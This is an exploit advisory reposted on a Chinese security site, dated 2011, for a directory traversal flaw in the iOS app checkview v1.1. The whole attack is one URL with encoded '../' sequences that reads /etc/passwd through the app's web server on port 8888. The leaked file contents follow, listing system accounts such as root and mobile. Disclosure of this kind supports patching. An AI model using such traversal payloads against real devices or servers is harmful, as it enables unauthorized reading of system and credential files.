checkview v1.1 for iPhone / iPod Touch Directory Traversal

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

checkview v1.1 for iPhone / iPod Touch Directory Traversal

来源：kimastory [at] gmail [dot] com 作者：kim@story 发布时间：2011-03-15

# Exploit Title: checkview(Ã¥ºä) v1.1 for iPhone / iPod touch, Directory Traversal
# Date: 03/14/2011
# Author: kim@story
# E-Mail : kimastory [at] gmail [dot] com
# Twitter : http://twitter.com/kimastory
# Software Link: http://itunes.apple.com/En/app/id381116321#
# Version: 1.1
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware

# There is directory traversal vulnerability in the checkview(Ã¥ºä).
# Exploit Testing

http://192.168.0.18:8888/..%2F..%2F..%2F..%2F..%2F/etc/passwd

#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file. Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告